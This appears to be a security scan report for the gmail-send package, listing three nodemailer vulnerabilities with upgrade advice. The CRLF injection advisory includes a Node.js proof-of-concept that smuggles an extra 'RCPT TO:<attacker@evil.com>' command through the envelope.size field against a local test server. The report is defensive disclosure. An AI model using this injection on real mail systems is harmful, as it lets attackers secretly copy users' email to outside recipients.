Vulnerabilities: 3 via 3 paths
Dependencies: 2
Source: GitHub
Commit: 1faf6949


high severity

Uncontrolled Recursion

  • Vulnerable module: nodemailer
  • Introduced through: nodemailer@6.10.1

Detailed paths

  • Introduced through: gmail-send@alykoshin/gmail-send#1faf69492a31464def919b00844320d9a6927a23 › nodemailer@6.10.1
    Remediation: Upgrade to nodemailer@7.0.11.

Overview

nodemailer is a module for "easy as cake" e-mail sending from Node.js applications.

Affected versions of this package are vulnerable to Uncontrolled Recursion in the addressparser function. An attacker can cause the process to terminate immediately by sending an email address header containing deeply nested groups, separated by many ':' characters.

Remediation

Upgrade nodemailer to version 7.0.11 or higher.


medium severity

Interpretation Conflict

  • Vulnerable module: nodemailer
  • Introduced through: nodemailer@6.10.1

Detailed paths

  • Introduced through: gmail-send@alykoshin/gmail-send#1faf69492a31464def919b00844320d9a6927a23 › nodemailer@6.10.1
    Remediation: Upgrade to nodemailer@7.0.7.

Overview

nodemailer is a module for "easy as cake" e-mail sending from Node.js applications.

Affected versions of this package are vulnerable to Interpretation Conflict due to improper handling of quoted local-parts containing @. An attacker can cause emails to be sent to unintended external recipients or bypass domain-based access controls by crafting specially formatted email addresses with quoted local-parts containing the @ character.

Remediation

Upgrade nodemailer to version 7.0.7 or higher.


low severity
new

CRLF Injection

  • Vulnerable module: nodemailer
  • Introduced through: nodemailer@6.10.1

Detailed paths

  • Introduced through: gmail-send@alykoshin/gmail-send#1faf69492a31464def919b00844320d9a6927a23 › nodemailer@6.10.1
    Remediation: Upgrade to nodemailer@8.0.4.

Overview

nodemailer is a module for "easy as cake" e-mail sending from Node.js applications.

Affected versions of this package are vulnerable to CRLF Injection via the envelope.size parameter in the sendMail function. An attacker can inject arbitrary SMTP commands by supplying CRLF characters in the size property, which are concatenated directly into the SMTP command stream. This can result in unauthorized recipients being added to outgoing emails or other SMTP commands being executed.

Note:

This is only exploitable if the application explicitly passes a custom envelope object with a user-controlled size property to the mail sending process.

PoC

const net = require('net');
const nodemailer = require('nodemailer');

// Minimal SMTP server that logs raw commands
const server = net.createServer(socket => {
    socket.write('220 localhost ESMTP\r\n');
    let buffer = '';
    socket.on('data', chunk => {
        buffer += chunk.toString();
        const lines = buffer.split('\r\n');
        buffer = lines.pop();
        for (const line of lines) {
            if (!line) continue;
            console.log('C:', line);
            if (line.startsWith('EHLO')) {
                socket.write('250-localhost\r\n250-SIZE 10485760\r\n250 OK\r\n');
            } else if (line.startsWith('MAIL FROM')) {
                socket.write('250 OK\r\n');
            } else if (line.startsWith('RCPT TO')) {
                socket.write('250 OK\r\n');
            } else if (line === 'DATA') {
                socket.write('354 Start\r\n');
            } else if (line === '.') {
                socket.write('250 OK\r\n');
            } else if (line.startsWith('QUIT')) {
                socket.write('221 Bye\r\n');
                socket.end();
            }
        }
    });
});

server.listen(0, '127.0.0.1', () => {
    const port = server.address().port;
    console.log('SMTP server on port', port);
    console.log('Sending email with injected RCPT TO...\n');

    const transporter = nodemailer.createTransport({
        host: '127.0.0.1',
        port,
        secure: false,
        tls: { rejectUnauthorized: false },
    });

    transporter.sendMail({
        from: 'sender@example.com',
        to: 'recipient@example.com',
        subject: 'Normal email',
        text: 'This is a normal email.',
        envelope: {
            from: 'sender@example.com',
            to: ['recipient@example.com'],
            size: '100\r\nRCPT TO:<attacker@evil.com>',
        },
    }, (err) => {
        if (err) console.error('Error:', err.message);
        console.log('\nExpected output above:');
        console.log('  C: MAIL FROM:<sender@example.com> SIZE=100');
        console.log('  C: RCPT TO:<attacker@evil.com>        <-- INJECTED');
        console.log('  C: RCPT TO:<recipient@example.com>');
        server.close();
        transporter.close();
    });
});

Remediation

Upgrade nodemailer to version 8.0.4 or higher.
